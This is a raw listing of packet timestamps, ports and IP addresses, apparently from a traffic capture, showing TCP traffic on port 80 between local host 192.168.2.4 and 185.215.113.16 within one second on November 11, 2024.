                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515083075 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515099049 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515100002 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515110970 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515124083 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515129089 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515136003 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515149117 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515151024 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515161991 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515177965 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515182018 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515202999 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515209913 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515223026 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515233040 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515239000 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515244961 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515259981 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515269041 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515295029 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515330076 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515384912 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515398026 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515408993 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515422106 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515431881 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515433073 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515444994 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515460014 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515466928 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515489101 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515532970 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515563011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515574932 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515585899 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515599012 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515609026 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515646935 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515728951 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515743017 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515753984 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515770912 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515803099 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515885115 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515897989 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515908957 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515922070 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515933037 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515933990 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515945911 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515970945 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515991926 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516061068 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516074896 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516086102 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516097069 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516110897 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516112089 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516127110 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516136885 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516144037 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516151905 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516164064 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516165972 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516181946 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516226053 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516424894 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516437054 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516448021 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516458988 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516470909 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516474962 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516480923 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516484022 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516495943 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516506910 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516524076 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516530037 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516536951 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516536951 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516551018 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516552925 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516587019 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.516614914 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517074108 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517086983 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517097950 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517137051 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517155886 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517252922 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517266989 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517278910 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517290115 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517302990 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517311096 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517314911 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517328024 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517338991 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517352104 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517379045 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517402887 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517416000 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517426968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517438889 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517450094 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517452955 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517462969 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517472029 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517476082 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517488003 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517497063 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517501116 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517513990 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517524958 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517533064 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517546892 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517556906 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517573118 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.517600060 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518080950 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518093109 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518100023 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518110991 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518121958 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518134117 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518146992 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518177032 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518234968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518249035 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518260956 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518271923 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518284082 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518286943 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518297911 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518306017 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518310070 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518331051 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518349886 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518384933 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518398046 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518408060 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518419981 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518434048 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518460035 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518577099 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518589020 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518599987 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518613100 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518621922 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518625021 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518632889 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518670082 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518755913 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518768072 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518778086 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518790960 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518798113 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518802881 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518821001 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518825054 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518832922 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518845081 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518847942 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518851995 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518860102 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518877983 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518907070 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.518923044 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519102097 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519114017 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519124031 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519136906 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519148111 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519153118 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519160032 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519160032 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519174099 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519186020 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519201994 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519227982 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519246101 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519259930 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519269943 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519300938 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519431114 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519443035 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519454002 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519464016 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519475937 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519478083 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519490957 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519501925 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519501925 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519520044 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519530058 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519531965 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519545078 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519547939 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519577980 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519579887 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519593954 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519603968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519606113 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519629955 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519659042 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519736052 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519779921 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519905090 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.519946098 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520086050 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520097017 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520107985 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520118952 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520131111 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520134926 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520142078 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520153999 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520155907 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520165920 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520176888 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520183086 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520215034 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520224094 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520226002 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520237923 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520248890 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520260096 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520266056 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520293951 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520318985 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520411968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520426989 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520438910 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520450115 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520462036 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520473003 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520473957 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520500898 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520517111 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520571947 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520586014 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520596027 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520611048 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520621061 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520623922 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520637035 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520648003 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520658970 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520661116 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520673037 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520678997 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520694971 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520714998 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520731926 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520745039 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520756006 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.520773888 CET8049762185.215.113.16192.168.2.4
